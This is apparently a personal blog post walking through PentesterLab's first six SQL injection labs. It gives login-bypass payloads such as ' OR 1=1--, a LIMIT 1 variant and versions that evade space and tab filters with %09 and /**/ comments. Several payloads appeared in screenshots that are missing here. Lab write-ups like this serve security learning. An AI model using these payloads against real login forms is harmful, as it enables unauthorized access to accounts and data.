Codex Electro

Idylls of a rogue byte...

View on GitHub
8 October 2023

PentesterLab SQL Injection Labs(Part 1)

by e1ec30

SQL Injection 01

We are greeted with a plain looking login page:

The challenge description contains the sql query (and frankly most of the solution lol), so we know it looks like:

SELECT * FROM user WHERE login='[USER]' and password='[PASSWORD]'

so we try the most basic injection payload: ' OR 1=1-- in both fields

and that solves the lab, cool :)

SQL Injection 02

The challenge description is a bit more vague this time so let’s launch the instance:

Well it looks exactly like sql 01 so let’s try the same payload:

Hmm, no luck……

Well the challenge description did mention something about double quotes, so let’s try that:

And that solves it, Yay :)

SQL Injection 03

The challenge prompt:

So it seems the developer is checking whether there is only one result because in our with our previous payloads all the rows will be returned because the condition 1=1 will always evaluate to true. But let’s try anyway:

No luck

So how do we get around that?

Well, the prompt gave us a hint: so a quick google search about the LIMIT keyword shows that it is basically used to return the first n matches of a query so we can add something like LIMIT 1 to our query to the end of our payload to make it only return one result, thereby passing the check. Let’s try:

Aaaand it works!!!

Nice :)

SQL Injection 04

First, the prompt:

This basically means our payload can’t contain any spaces and sure enough when we try…:

it fails

But the prompt also suggests we use tabs so let’s try that, but when we try to press the tab key in the input fields we find we can’t. So how do we include tabs in our input?

You can use an intercepting proxy like Burp to edit the request and change the spaces to tabs but I just decided the HackBar Chrome extension:

The url-encoded form of the \t (tab) character is %09 (highlighted in yellow)

Click on Execute and…

We log in!!! Sweet :)

SQL Injection 05

As usual: The prompt:

It seems the developer also blocked tabs this time around so our previous payload won’t work but the prompt also hinted that we might not need them anyway so what can we use between keywords?

Let’s think about this a little: what we need is something that

  1. Is not a whitespace character, so no spaces or tabs
  2. Will separate our keywords, and
  3. Will not change the meaning of our query, meaning it will be ignored by the SQL interpreter(or engine, whatever)

Now if you know something about programming, you’ll know there’s a name for number 3, it’s called a comment and that’s what we are going to use in our payload because they satisfy all our criteria, from a quick Google search, we learn that comments in sql are surrounded by /**/ or preceeded by #.

So our payload will look something like:

'/**/OR/**/1=1/**/#

When we try it:

It works!!

SQL Injection 06

The prompt:

Well here the description tell us everything we need to know to solve the lab. I also read the linked blog post to further understand how it works

we try the payload:

and we’re in:

tags: